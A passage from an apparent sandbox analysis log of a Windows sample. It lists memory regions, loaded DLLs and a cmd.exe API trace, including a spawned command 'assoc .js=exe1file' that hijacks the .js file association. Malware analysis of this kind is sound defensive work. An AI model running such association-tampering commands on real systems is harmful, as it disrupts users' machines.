"\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2254 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2255 start_va = 0x2240000 end_va = 0x2576fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2256 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2257 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2258 start_va = 0x80000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2259 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2260 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2261 start_va = 0x2580000 end_va = 0x2799fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2262 start_va = 0x27a0000 end_va = 0x29bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 2263 start_va = 0x810000 end_va = 0x91dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 2264 start_va = 0x960000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 2265 start_va = 0x29c0000 end_va = 0x2bd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 2266 start_va = 0x2090000 end_va = 0x219dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 2267 start_va = 0x2230000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 2268 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2269 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2270 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2271 start_va = 0x2be0000 end_va = 0x2c9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002be0000" filename = "" Region: id = 2272 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2273 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2274 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2275 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2276 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2277 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2278 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2279 start_va = 0x680000 end_va = 0x684fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2280 start_va = 0x690000 end_va = 0x690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2281 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2282 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2283 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2284 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 166 os_tid = 0x4e4 Thread: id = 167 os_tid = 0x4e0 Thread: id = 168 os_tid = 0x234 Thread: id = 169 os_tid = 0x7ac Process: id = "25" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7413000" os_pid = "0x794" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C assoc .js=exe1file" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2329 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2330 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2331 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2332 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2333 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2334 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2335 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2336 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2337 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2338 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2339 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 2340 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2341 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2342 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2343 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2344 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2345 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2346 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2347 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2348 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2349 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2350 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2351 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2352 start_va = 0x470000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 2353 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2354 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2355 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2356 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2357 start_va = 0x5b0000 end_va = 0x66dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2439 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2440 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2441 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 2442 start_va = 0x770000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2443 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2444 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2445 start_va = 0x6ab60000 end_va = 0x6ab67fff monitored = 0 entry_point = 0x6ab61840 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 2446 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2447 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2448 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 2449 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2450 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2451 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2452 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2453 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2454 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2455 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2456 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2457 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2458 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2459 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2460 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2461 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 2462 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2463 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2464 start_va = 0x7e0000 end_va = 0x967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 2465 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2466 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2467 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2468 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2469 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2470 start_va = 0x970000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 2471 start_va = 0x4d60000 end_va = 0x615ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 2472 start_va = 0x6160000 end_va = 0x655afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006160000" filename = "" Region: id = 2473 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2474 start_va = 0x71ee0000 end_va = 0x71f54fff monitored = 0 entry_point = 0x71f19a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2475 start_va = 0xb00000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 2476 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2477 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2478 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2479 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2480 start_va = 0xb00000 end_va = 0xb90fff monitored = 0 entry_point = 0xb38cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2481 start_va = 0xc90000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Thread: id = 171 os_tid = 0x758 [0273.180] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0273.180] __set_app_type (_Type=0x1) [0273.180] __p__fmode () returned 0x74ac4d6c [0273.180] __p__commode () returned 0x74ac5b1c [0273.180] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0273.180] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0273.181] GetCurrentThreadId () returned 0x758 [0273.181] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x758) returned 0x84 [0273.181] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0273.181] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0273.181] SetThreadUILanguage (LangId=0x0) returned 0x409 [0273.189] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0273.189] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0273.189] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0273.189] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0273.190] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0273.190] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0273.190] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0273.190] GetConsoleOutputCP () returned 0x1b5 [0273.825] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0273.825] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0273.825] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.825] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0273.887] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.887] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0273.983] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.983] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0274.162] _get_osfhandle (_FileHandle=0) returned 0x38 [0274.162] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0274.514] _get_osfhandle (_FileHandle=0) returned 0x38 [0274.514] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0274.526] GetEnvironmentStringsW () returned 0x4b7cd8* [0274.526] GetProcessHeap () returned 0x4b0000 [0274.526] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa1a) returned 0x4b8700 [0274.526] FreeEnvironmentStringsA (penv="A") returned 1 [0274.526] GetProcessHeap () returned 0x4b0000 [0274.526] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x4) returned 0x4b0550 [0274.527] GetEnvironmentStringsW () returned 0x4b7cd8* [0274.527] GetProcessHeap () returned 0x4b0000 [0274.527] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa1a) returned 0x4b9128 [0274.527] FreeEnvironmentStringsA (penv="A") returned 1 [0274.527] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0274.527] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0274.527] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0274.527] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0274.527] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0274.527] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0274.527] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0274.527] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0274.527] RegCloseKey (hKey=0x94) returned 0x0 [0274.528] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0274.528] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0274.528] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, 